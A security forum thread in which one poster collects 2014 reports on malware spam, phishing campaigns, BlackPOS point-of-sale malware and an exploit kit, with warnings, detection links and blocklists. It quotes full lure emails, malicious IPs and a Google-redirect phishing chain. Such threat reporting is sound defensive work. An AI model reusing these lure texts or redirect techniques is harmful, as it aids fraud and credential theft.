29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:

my new photo ..
if you like my photo to send me u photo

29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/e4c328815cc2840b53514e7bdcc43c83b29c0ae4676c755b4ee9587aa8c37db9/analysis/1409297373/
___

Netflix PHISH ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-netflix-site-wants-to-leave-you-high-and-dry/
Aug 29, 2014 - "... This type of -scam- is called phishing and typically starts with an urgent-looking message in your inbox. Upon following the directions (typically clicking on a link), you’re taken to a page that looks like an exact -replica- of the genuine company. Eric Lawrence, creator of the famous Fiddler web debugger, spotted a phishing attack targeting Netflix customers... This new one is more sophisticated (better graphics, etc) although it does -not- have the tech support scam element but instead goes after your identity and wallet.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/phish1.png?w=564
The -bogus- domain netflix-ssl .net (IP address: 176.74.28.254) was registered a few days ago through the “Crazy Domains FZ-LLC” registrar... The information requested on the phishing page includes name, address and credit card details. It’s sent back to the bad guys’ server with multiple POST requests... Note the clever use of a long URL that resembles the genuine one and that may be particularly effective on mobile devices:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/iphone5.png
We are reporting this site to the registrar and hosting company so that it can be taken down as soon as possible. Phishing scams are always getting more elaborate and unfortunately very hard to block because they keep popping up on new domains, registrars etc. truly making this a cat and mouse game between crooks and the security community. While many web browsers (Internet Explorer, Google Chrome, Mozilla Firefox) do have anti-phishing technology that blocks access to fraudulent sites, there often is a bit of a lag between the time a new site comes up and when it gets blacklisted. The best defence against these scams is awareness and suspicion from any email purporting to be from a company you deal with. There are some telltale signs to recognize phishing attacks such as poor grammar, spelling mistakes or obviously unrelated URLs as well as a general ‘urgency’ in the tone of the message."

176.74.28.254: https://www.virustotal.com/en/ip-address/176.74.28.254/information/

netflix-ssl .net / 92.222.121.100: https://www.virustotal.com/en/ip-address/92.222.121.100/information/
8.31.2014 9:02AM EDT
___

Internet Disconnection SCAM calls
- http://www.hoax-slayer.com/telstra-tech-support-scam-calls.shtml
Aug 29, 2014 - "Callers claiming to be from the technical department of Internet Service Providers (ISPs) such as Telstra warn that your Internet service is about to be disconnected because hackers have accessed your computer or it has been infected with viruses... The calls are -not- from your ISP... The best way to deal with these scammers is to simply hang up on their bogus calls... if you are unsure, terminate the call and contact the service provider directly. DO NOT use a phone number supplied by the scammers... find a phone number for the provider via a legitimate source such as a phone directory or bill. In some cases, if you are doubtful of their claims, the scammers may provide a 'technical support' phone number supposedly belonging to your ISP. But, when you call the number, you will simply be reconnected to the same scammer... service providers such as Telstra may contact you from time to time to review your service options or discuss a problem with your account, they will -never- demand an immediate -fee- over the phone to rid your computer of hackers or viruses. Nor will they ask you to download software that gives them access to your computer. Any caller that makes such a request should -not- be trusted..."
___

Fake Refund email targets UK taxpayers
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-refund-mail-targets-uk-taxpayers/
Aug 29, 2014 - "Taxpayers in the UK should be wary of emails claiming they’re owed a tax refund to the tune of 100.60 GBP... The mail reads:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax1.jpg
Clicking the Ow.ly link in the email sends potential victims to a .zip download hosted on what appears to be a -compromised- German bicycle shop website. Inside is a .html file containing a -fake- refund form. As a sidenote, it’s a little unusual to see scammers making use of Ow.ly shortening links for a HMRC phishing scam. The -fake- refund form asks for name, DOB, address, postcode, account number, full card details …all the usual bits and pieces of information required to -swipe- the payment information.
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/faketax2.jpg
... the refund amount pre-filled on the form is 100.65 GBP. I’m not sure where the extra five pence comes from, though given that this is all a massive work of fiction anyway I don’t think it matters besides helping to tip off recipients that this isn’t a real refund. Feel free to report these missives to HRMC directly*, and remember: HMRC will -never- ask for payment information or notify taxpayers of refunds by email."
* http://www.hmrc.gov.uk/security/reporting.htm
___

New BlackPOS Malware emerges in-the-Wild - targets Retail Accounts
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/
Aug 29, 2014 - "... a brand new BlackPOS (point-of-sale) malware detected by Trend Micro as TSPY_MEMLOG.A. In 2012, the source code of BlackPOS was -leaked- enabling other cybercriminals and attackers to enhance its code. What’s interesting about TSPY_MEMLOG.A is it disguises itself as an installed service of known AV vendor software to avoid being detected and consequently, deleted in the infected PoS systems... The malware can be run with options: -[start|stop|install|uninstall]. The –install option installs the malware with service name =<AV_Company> Framework Management Instrumentation, and the –uninstall option deletes the said service. The RAM scraping routine begins as a thread when the installed service starts. It may only start its main routine if it has successfully been registered as a service. Apart from masquerading itself as an AV software service, another new tactic of TSPY_MEMLOG.A is its updated process iteration function. It uses CreateToolhelp32Snapshot API call to list and iterate all running processes. BlackPOS variants typically use the EnumProcesses API call to list and iterate over the processes. It drops and opens a component t.bat after it has read and matched the track data. This track data is where the information necessary to carry out card transactions is located; on the card this is stored either on the magnetic stripe or embedded chip. The data will eventually get written out to a file called McTrayErrorLogging.dll. This is similar to what happened in the PoS malware attack involving the retail store, Target last December 2013... we recommend enterprises and large organizations implement a multi-layered security solution to ensure that their network is protected against vulnerabilities existing in systems and applications as this may be used to infiltrate the network. In addition, check also when a system component has been modified or changed as criminals are using known in-house software applications to hide their tracks. IT administrators can use the information on malware routines and indicators of compromise (IoCs) here to determine if their network has been compromised already by this new BlackPOS malware..."
(More detail at the trendmicro URL above.)
> http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-pos-system-breaches.pdf
___

Microsoft boots 1,500 apps from its Windows Store
- http://www.theinquirer.net/inquirer/news/2362576/microsoft-boots-1-500-apps-from-its-windows-store
Aug 29 2014 - "... Microsoft GM of Windows Apps and Store Todd Brix said in a blog post*, "As Windows Store expands to reach more customers in more markets with a growing list of great titles, we are continuously looking for ways to improve both customer experience and developer opportunity. We strive to give our worldwide customer base easy access to amazing app experiences while keeping developer friction to a minimum. From time to time this process slips out of sync and we need to recalibrate". Brix admitted that Microsoft found that some customers weren't satisfied with the Windows Store and some of the apps they found there, but he described the problem as involving merely misleading app descriptions... After relating how Microsoft tackled identifying apps having "confusing or misleading titles", Brix said, "Most of the developers behind apps that are found to violate our policies have good intentions and agree to make the necessary changes when notified. Others have been less receptive, causing us to remove more than 1,500 apps as part of this review so far....", not forgetting to reassure customers that "as always we will gladly refund the cost of an app that is downloaded as a result of an erroneous title or description".
* http://blogs.windows.com/buildingapps/2014/08/27/how-were-addressing-misleading-apps-in-windows-store/

:fear: :mad:

AplusWebMaster
2014-09-01, 13:00
FYI...

Tesco Phish ...
- http://myonlinesecurity.co.uk/tesco-payback-rewards-phishing/
1 Sep 2014 - "... email arrives saying 'Tesco Payback Rewards'... email arrives apparently from Tesco saying 'Tesco Payback Rewards' that offers you £150 for filling in a Tesco customer satisfaction survey... it is a -scam- and is a phishing -fraud- designed to steal your bank and credit card details. The email says something like this:
Tesco Customer Satisfaction program selected you to take part in our quick survey.
To earn your 150 £ reward, please click here and complete the form.

Screenshots:
- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards1.png

- http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/tesco_payback-_rewards2.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them... careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
___

Fake Statement SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-01092014-fake-pdf-malware/
1 Sep 2014 - "'Statement as at 01/09/2014' pretending to come from Cathy Rossi < C.Rossi@ tcreidelectrical .co.uk > is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... emails are not being sent from tcreidelectrical .co.uk or T C REID (ELECTRICAL) LTD, As far as we can determine they have not been hacked or their website or email system compromised... Email reads:

Please find attached statement from T C REID (ELECTRICAL) LTD as at 01/09/2014.

1 September 2014 : D0110109.PDF.zip ( 274kb): Extracts to D0110109.PDF.exe
Current Virus total detections: 2/55* . This Statement as at 01/09/2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dd96f70183fd6f9482243e04b02a75c66040bafa64f612aebc99b4302709f1d7/analysis/1409570924/
___

O/S Market Share - August 2014 ...
- http://www.netmarketshare.com/operating-system-market-share.aspx?qprid=10&qpcustomd=0
Browser Market Share
- http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
9/1/2014
___

China gives MS 20 days to provide explanation in anti-trust probe
- http://www.reuters.com/article/2014/09/01/us-china-antitrust-microsoft-idUSKBN0GW1FD20140901
Sep 1, 2014 - "A Chinese anti-trust regulator said on Monday it has given Microsoft 20 days to reply to queries on the compatibility of its Windows operating system and Office software suite amid a probe into the world's largest software company. The State Administration for Industry and Commerce (SAIC) questioned Microsoft Vice President David Chen and gave the company a deadline to make an explanation... Microsoft is one of at least 30 foreign companies that have come under scrutiny by China's anti-monopoly regulators as the government seeks to enforce its six-year old antitrust law. Critics say the law is being used to unfairly target overseas businesses, a charge the regulators deny. According to a state media report on Monday, Microsoft's use of verification codes also spurred complaints from Chinese companies. Their use "may have violated China's anti-monopoly law", the official Xinhua news agency said on Monday. Verification codes are typically used by software companies as an anti-piracy mechanism. They are provided with legitimate copies of software and can be entered to entitle customers to updates and support from the manufacturer. Microsoft has long suffered from piracy of its software within China. Former Chief Executive Steve Ballmer told employees in Beijing that the company made less revenue in China than it did in the Netherlands... SAIC also repeated that it suspected the company has not fully disclosed issues relating to the compatibility of the software and the operating system... Last month, a delegation from chipmaker Qualcomm, led by company President Derek Aberle, met officials at the National Development and Reform Commission (NDRC) as part of that regulator's investigation of the San Diego-based firm. NDRC said earlier this year that the U.S. chipmaker is suspected of overcharging and abusing its market position in wireless communication standards. Microsoft's Nadella is expected to make his first visit to China as chief executive later this month."

:mad: :fear:

AplusWebMaster
2014-09-02, 14:01
FYI...

Something evil on 95.163.121.188 (Sweet Orange EK)
- http://blog.dynamoo.com/2014/09/something-evil-on-95163121188-sweet.html
2 Sep 2014 - "95.163.121.188 is currently hosting the Sweet Orange Exploit Kit (hat tip*). The IP is allocated to Digital Networks CJSC (aka DINETHOSTING) that has featured on this blog many times before**...
(Long list of domains at the URL above.)
... The domains appear to be legitimates ones that have been hijacked in some way.
95.163.121.188 forms part of a large netblock of 95.163.64.0/18 - I have had -half- of this (95.163.64.0/19) blocked for several years which has stopped a great deal of badness, so I recommend that you -block- either the /19 or /18..."
* http://www.malware-traffic-analysis.net/2014/08/29/index.html

** http://blog.dynamoo.com/search/label/DINETHOSTING

> https://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack
"... automated iframe obfuscating services for use in web injections. The iframes are -injected- into high-traffic-volume websites and force the users of the websites to visit end points that serve exploits carrying malware..."
___

Fake 'Bonus' SPAM/SCAM ...
- http://myonlinesecurity.co.uk/automated-draw/
2 Sep 2014 - "email received that tells you that you have won £1000 in an automated draw and haven’t claimed it yet:

Attempting to contact <REDACTED>
This is automated draw #23851
Our system shows you have been awarded with £1000!
According to our records, voucher wasn’t collected yet
Please be informed that your voucher is still valid. You may claim your wininngs and use them without making any deposit.
Confirm your email here to claim your £1000 voucher.
Have fun !
Lindsey Lane
CRM Manager..
* This offer is available to new players only.
You have received this email because you have requested more information from BonusNews...

Clicking the button that says claim your reward (or any other of the buttons) gives you a file to run on your computer that installs some casino software that is detected by several anti-malware programs as unwanted*..."
* https://www.virustotal.com/en/file/a615d125ab7423f6c89e5074ed42e568a898f3beab6c3c3c174f417c54529f89/analysis/
___

Hacks behind biggest-ever Password Theft begin Attacks
- http://it.slashdot.org/story/14/09/01/2213202/hackers-behind-biggest-ever-password-theft-begin-attacks
1 Sep 2014 - "Back in August, groups of Russian hackers assembled the biggest list of compromised login credentials ever seen: 1.2 billion accounts. Now, domain registrar Namecheap reports* the hackers have begun using the list to try and access accounts. 'Overnight, our intrusion detection systems alerted us to a much higher than normal load against our login systems. ... The group behind this is using the stored usernames and passwords to simulate a web browser login through -fake- browser software. This software simulates the actual login process a user would use if they are using Firefox/Safari/Chrome to access their Namecheap account. The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts'. They report that most login attempts are failing, but some are succeeding. -Now- is a good time to check that none of your important accounts share passwords."
* http://community.namecheap.com/blog/2014/09/01/urgent-security-warning-may-affect-internet-users/

:mad: :fear:

AplusWebMaster
2014-09-03, 13:44
FYI...

Fake NDR SPAM - PDF malware
- http://myonlinesecurity.co.uk/ndr-bill-fake-pdf-malware/
3 Sep 2014 - "'NDR Bill' pretending to come from Ebilling <Ebilling@ westlothian .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Non domestic rates bills normally come out in February or March each year, so using this email template in September will or should raise alarm bells immediately. This particular email allegedly being sent by a Scottish Local Council should immediately alert a recipient in the rest of UK to being totally bogus:
Please find attached your Non Domestic Rates bill.
If your account is in credit you are due a refund unless you have any other debt due to the Council.
To allow your credit to be processed please confirm:
- If you want the credit transferred to another account you have with us. Please confirm the account details. – If you want the credit refunded by cheque, please confirm who it should be sent to and the address.
Links to Non Domestic Rates information are detailed below.
Important Note: If you access these links using a mobile phone the network provider may charge for this service.
Yours sincerely Scott Reid Revenues Manager ...

3 September 2014: 00056468.pdf.zip ( 207 kb): Extracts to 00056468.pdf.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5d7a2618d95f21ab31cdea298dcb9b57739c0432acaad2167d2651538517c808/analysis/1409725854/

- http://blog.dynamoo.com/2014/09/fake-westlothiangovuk-ndr-bill-email.html
3 Sep 2014 - "Sometimes spammers come up with weird approaches. This one is a bill from West Lothian Council in the UK.. well, actually it -isn't- a bill but it comes with a malicious attachment.
From: Ebilling [Ebilling@ westlothian .gov.uk]
Date: 3 September 2014 09:20
Subject: NDR Bill
Please find attached your Non Domestic Rates bill...

Attached is a file 00056468.pdf.zip which contains a malicious executable D0110109.PDF.exe (which has an icon to make it look like a PDF file). This has a low detection rate at VirusTotal of 4/55*... This second component has a VT detection rate of just 3/55**. The Anubis report shows an attempted phone home to 80.94.160.129 (National Academy of Sciences of Belarus) and 92.222.46.165 (OVH, France)
Recommended blocklist:
80.94.160.129
92.222.46.165 ..."
(More at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/b9a54ef4f769068af029aa7941c464990c476911180c9f4ec3379ab3b51ff5b3/analysis/1409733696/

** https://www.virustotal.com/en-gb/file/960ed795dca89e50745251adf6712719a1af1aa5fd1a66c9424c777574180548/analysis/1409734574/
___

“YouTube Account Manager has sent you a Message…”
- https://blog.malwarebytes.org/fraud-scam/2014/09/youtube-account-manager-has-sent-you-a-message/
Sep 3, 2014 - "We’ve seen some complaints of a message sent to YouTube users via the YouTube messaging system, warning of account suspension:

YouTube account manager has sent you a message
We’d like to inform you that due to repeated or severe violations of our community guidelines and your YouTube account will be suspended 3 days from the time of this message. After careful review we determined that activity in your account violated our community guidelines, which prohibit spam, scams or commercially deceptive content. Please be aware that you are prohibited from accessing, possessing or creating any other YouTube accounts.
Please follow the following instructions to recover your account:
1. Please contact your account manager here: [url]
2. You have to complete a quick survey to make sure you are human.
3. Wait for our email explaining the next steps.
* If you decide to ignore this message and not follow the above steps your account will be suspended.

This is what you would see after hitting the supplied link in the message:
“Complete a survey to verify your account”
> http://blog.malwarebytes.org/wp-content/uploads/2014/09/ytaccountmanager1.jpg
This one is a survey scam, and whoever is sending these messages is looking to make a little cash along with the panic they’re no doubt whipping up in YouTube users right about now. The links displayed on the left hand side are regional and will take clickers to various offers / surveys / signups and downloads. If you’re in any doubt as to the status of your YouTube account, you’d be better served contacting them directly than being tricked by these false messages currently in circulation. Scammers will often use similar tactics to send phishing links and malware, so in some ways recipients of this missive are getting the best of a bad deal – it’s “only” surveys and forms to fill in, along with the occasional download. However, that doesn’t mean we should rush to jump through their survey sign-up hoops either. Steer clear of this one, and keep on making those videos."
___

Fake 'Internet free' email SCAM - malware attachment
- http://myonlinesecurity.co.uk/transaction-via-internet-free-charge-idi613410_745-fake-pdf-malware/
3 Sep 2014 - "'Transaction via the Internet free of charge, ID:I613410_745' pretending to come from Santander BillPay is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer... The -scammers-, malware purveyors and phishers do get more creative every day and this email is quite creative, with a link to report suspicious emails to Santander and genuine links to Visa, MasterCard and VeriSign in their efforts to persuade you that it is a genuine email and that you should open the attachment:
Dear <removed>,
Our system detectet that you have made a bill payment using our cloud-based BillPay processing website.
You can find all details regarding the transaction in attachment.
Important information on recent fake email activityA number of UK banks have recently been targeted by fraudsters using emails to ask customers to enter their security details into a fake website.
At Santander Corporate Banking we will never send you an email that asks you to verify your security details or link to Internet banking. If you receive an email claiming to be from Santander Corporate Banking that you are suspicious about, please forward it to phishing@ santander .co .uk
If you are worried that someone may already have your personal security details, then please contact us on 0151 966 2105. Calls are recorded and may be monitored for security, quality control and training purposes...

3 September 2014 : I613410_745.zip ( 57kb): Extracts to Bill_Payment_2E_832e458.pdf.exe
Current Virus total detections: 1/54* ... This 'Transaction via the Internet free of charge, ID:I613410_745' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cdbf146c2e551614c0f66b700b36236afdb6edb66c91e29b8da79037e3513d5e/analysis/1409750135/
___

Fake attached CBE form SPAM - PDF malware
- http://myonlinesecurity.co.uk/please-review-attached-cbe-form-pdf-malware/
3 Sep 2014 - "'Please review the attached CBE form' pretending to come from Jonathan.Bledsoe@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email contains a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader...
Importat message, read right away.
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team

3 September 2014 : cbe_form.pdf - Current Virus total detections: 8/54*
... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/415616d596d105b6b7063dda97c25411747c4b7fe9543d8a9214483be7bd2675/analysis/1409761379/
___

Fake 'August report' SPAM - PDF malware
- http://myonlinesecurity.co.uk/august-report-fake-pdf-malware/
3 Sep 2014 - "'August Report' pretending to come from Jackie Cantrell <Jackie.Cantrell@ bankmanager .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Hello , Please find attached documents for last month. Please could you sign the BACs form and return it as your approval that I am to go ahead with the transmission. Kind regards Jackie Payroll Manager

This email attachment has 2 files inside it. Both are identical although have different names, so the bad guys get 2 bites at the cherry.
3 September 2014: BACs_Documents.zip ( 20 kb): Extracts to BACs_Documents.scr
and to Case_090314.scr . Current Virus total detections: 12/55* . This August Report is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409724912/
___

Fake Sky .com SPAM ...
- http://blog.dynamoo.com/2014/09/skycom-statement-of-account-spam-again.html
3 Sep 2014 - "These fake Sky emails are pretty common and have a malicious attachment:
Date: Wed, 3 Sep 2014 09:17:22 +0200 [03:17:22 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for August, invoice as this is now due for payment.
Regards,
Clark ...

The attachment is Statement.zip which contains a malicious executable Statement.scr which has a reasonable VirusTotal detection rate of 18/55*. The Anubis report indicates that the binary phones home..."
* https://www.virustotal.com/en-gb/file/73466f316153b2a347a8e10fe83fd5e84e8c7ab494492cbc9e749fc5777fb1d7/analysis/1409736793/
___

Fake 'Important Documents' email SPAM - PDF malware
- http://myonlinesecurity.co.uk/re-important-documents-fake-pdf-malware/
3 Sep 2014 - "'RE: Important Documents' pretending to come from Simon Leiman <Simon.Leiman@ rbs .com> the name of sender at RBS appears to be random and can be any name is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... No attachment in the email but a link to a compromised website to download the malware:
RE: Important Documents
[RBS Logo Image]
Building tomorrow
RE: Important Information
We’re letting you know we have received a request from your bank to complete and sign the attached documents.
To view/download the documents please click here.
Please fill out the documents and fax them at +44 131 242 0017
Simon Leiman
Senior Accounting Manager
Tel. +44 131 242 0017
Email: Simon.Leiman@ rbs .com
? Royal Bank of Scotland 2014 ...

3 September 2014: AccountDocuments.zip ( 12kb) : Extracts to AccountDocuments.scr
Current Virus total detections: 4/54* . This 'RE: Important Documents' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/35492a48e63c523aec07cae081645dbad07680916f6cfac51f34dcdde41c0822/analysis/
___

iCloud hack/leak now being used as Social Engineering lure
- http://blog.trendmicro.com/trendlabs-security-intelligence/icloud-hacking-leak-now-being-used-as-social-engineering-lure/
Sep 3, 2014 - "... it was certainly only a matter of time before some enterprising cybercriminal decided that things were ripe for leveraging with socially-engineered threats. And that’s just what happened, as our scanning brought to our attention some freshly-concocted schemes targeting those looking for the photos borne from the aforementioned leak. The first threat we found hails from Twitter, in the form of a tweet being posted with hashtags that contain the name of one of the leak’s -victims- Jennifer Lawrence. The tweet spots a shortened link that, if -clicked- leads the user to a website offering a video of the actress in question...
Tweet with malicious link:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencetweet.png
Website with offered video:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencewebsite.png
If the user goes on to engage the playback, they are instead redirected to a download page for a ‘video converter’. The downloaded file is detected as ADW_BRANTALL:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencevideoconverter.png
Besides this bait-and-switch maneuver, this particular threat also spread itself on Facebook by forcing users to share the malicious site on their profiles before they are given the ability to ‘play’ the offered video. This would result in the user’s wall being spammed with the link, as well as the download of another variant of ADW_BRANTALL. The spamming is shown below.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/lawrencefacebookwall.png
Of course, in both cases, the user does not get to watch any video at all. And from our analysis, it appears that the majority of the users affected by this are from the United States (70%). We also discovered several malicious files floating around the internet that have been relabeled as zipped archives and/or video files of the leaked pictures in question. Again, we believe these files as part of a cybercriminal scheme to target those looking for the pictures themselves... With this incident in mind, it’s a good time to remind users that all popular news events – the iCloud leak being a prime example of it – will always have cybercriminals taking advantage of it in one way or another. If it’s something that you’ll use a search engine for, there’s a good chance that they’ve already created threats for it that will jump on you the moment you go looking. And do note that the threats we’ve talked about above are not the only ones lying around in wait! Always get your online news from trusted websites, and refrain from looking for/and downloading illegal material (such as leaked private photos or cracked software). Look into installing a security solution as well, if you haven’t done so already in these turbulent times. A few fleeting moments of convenience or enjoyment is never worth the hassle."
___

'Infrastructure-configuration' adjustment
- http://www.reuters.com/article/2014/09/03/us-facebook-outages-idUSKBN0GY2EQ20140903
Sep 3, 2014 - "Facebook Inc went down briefly for an unknown number of U.S. users on Wednesday afternoon in what appeared to be the latest outage to affect the world's largest social network. Several users had earlier reported getting an error message, "unable to connect to the Internet" when attempting to sign in. Facebook said the log-in problems arose after what it called an infrastructure-configuration adjustment..."

:mad: :fear:

AplusWebMaster
2014-09-04, 15:10
FYI...

Fake sage .co.uk "Invoice_7104304" SPAM - PDF malware
- http://blog.dynamoo.com/2014/09/sagecouk-invoice7104304-spam.html
4 Sep 2014 - "This -fake- invoice from Sage is actually a malicious PDF file:
From: Margarita.Crowe@ sage .co.uk [Margarita.Crowe@ sage .co.uk]
Date: 23 July 2014 10:31
Subject: FW: Invoice_7104304
Please see attached copy of the original invoice (Invoice_7104304).

Attached is a file sage_invoice_3074381_09042014.pdf which is -identical- to the payload for this Companies House spam* ..."
* http://blog.dynamoo.com/2014/09/companies-house-ar01-annual-return.html
4 Sep 2014 - "This -fake- Companies House spam comes with a malicious attachment.

Screenshot: https://4.bp.blogspot.com/-ye6yNCTxN5k/VAhC_lNqhQI/AAAAAAAAFjc/azWsv0o1st0/s1600/companies-house-5.png

Attached is a malicious PDF file ar01_456746_09042014.pdf which has a VirusTotal detection rate of 5/54**. The Malware Tracker report shows that this attempts to exploit the CVE-2013-2729 flaw that was patched over a year ago.."
** https://www.virustotal.com/en-gb/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/

- http://myonlinesecurity.co.uk/fw-invoice_5294370-pdf-malware/
4 Sept 2014: sage_invoice_3074381_09042014.pdf - Current Virus total detections: 4/55***
*** https://www.virustotal.com/en/file/ecfb08b38bafedfebe2ed9175d10b0490a4afdf62597a628e0f083e406e58a2a/analysis/1409823534/
___

Fake 'Unauthorised iTunes Purchase' email - PHISH
- http://myonlinesecurity.co.uk/unauthorised-itunes-purchase/
4 Sep 2014 - "email received that says 'Unauthorised iTunes Purchase'. The interesting point about this one is the phishing URL. It is a pass through from a genuine Google URL https ://www.google .com/url?gc=PAH96di-ZUnHVlY&q=%68%74tp%3a%2f%2Fdl6.c1l%2eus%2FSb7ouez&sa=D&usg=AFQjCNEQ84I8qa2xYHVEKwXmJMrXG0_GhA which bounces via another url http ://dl6.c1l .us/Sb7ouez to end up on http ://111.90.144.179 /datacare/login/auth/dc347f94af30dff3ce1efd53f335d0e7/low_aa/
I had no idea that you could use google, especially a HTTPS (secure site) link to pass through to a phishing or any other site. Almost anybody seeing a google link will think that it is safe. Obviously this is a big security risk that Google servers allow this sort of divert or pass through and it needs to be plugged. The site asks for your Apple ID and password, then sends you to a page saying:
My Apple ID
It looks like someone used your data to make unverified purchase.
We need to be sure that you’re real holder of this account and match the information you will provide us now with the information in our databases. Please make sure your information is correct before submitting it to us or it may cause further delays.
Thank you.

Then wants you to fill in the form to give them your Name, address, Date of Birth, Credit card details, Mobile phone number etc. Everything they need to take over your identity in the virtual world as well as clear out all your bank and credit card accounts. It will then bounce you to the correct Apple page..."

111.90.144.179: https://www.virustotal.com/en-gb/ip-address/111.90.144.179/information/

:mad: :fear::fear:

AplusWebMaster
2014-09-05, 14:42
FYI...

Phishing safety ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-safety-is-https-enough/
Sep 5, 2014 - "It was recently reported that Google would improve the search ranking of HTTPS sites in their search engine. This may encourage website owners to switch from HTTP to HTTPS. Cybercriminals are -also- taking part in this switch... we recently spotted a case where users searching for the -secure- version of a gaming site were instead led to a phishing site. We researched phishing sites that used HTTPS and were blocked by Trend Micro web reputation technology from 2010-2014. Based on our investigation, the number of phishing sites is increasing and we expect it to -double- towards the latter part of 2014...
Number of HTTPS phishing sites from 2010 to 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/HTTPS_count.jpg
One of the reasons for this spike is that it is easy for cybercriminals to create websites that use HTTPS: they can either compromise sites that already use HTTPS, or use legitimate hosting sites or other services that already use HTTPS. There is no need for the cybercriminals to acquire their own SSL certificate, since they have just abused or compromised servers that -do- have valid certificates...
Screenshots of legitimate site (left) and phishing site (right):
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/legvsphishingsite.jpg
... While some sites have a green icon bar in the address bar as a security indicator, users still need to check the common name and organization. For example, users search for the Bank of America login page and click on the top result. In the login page, they can check for the green icon bar and the domain name, (which in this case is bankofamerica.com). When they click the green icon bar, a window will pop up. Users can then check for the “Issued to” which is equivalent to “Common Name.” Note that the Common Name should be similar to the domain name...
Check the green icon bar and the domain name to determine if it is a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/boagreenbaricon.jpg
As more and more sites use SSL due to the boost in Google search rankings, users will have to become aware that the padlock of HTTPS is no longer a sign that they are visiting a safe site. They must first check the certificate before proceeding to give enter credentials and personal identifiable information (PII)... Based on feedback from the Smart Protection Network data, the top affected countries that visit HTTPS phishing sites are US and Brazil.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Affected-Countries-01.jpg ..."
___

Hoax email comes with malicious Word doc
- http://blog.dynamoo.com/2014/09/shakira-death-hoax-email-comes-with.html
5 Sep 2014 - "... Spanish-language spam email reports the (fake) death of Shakira in a car accident. Attached is a Word document that contains a malicious macro... translates as:
Shakira dies in serious accident
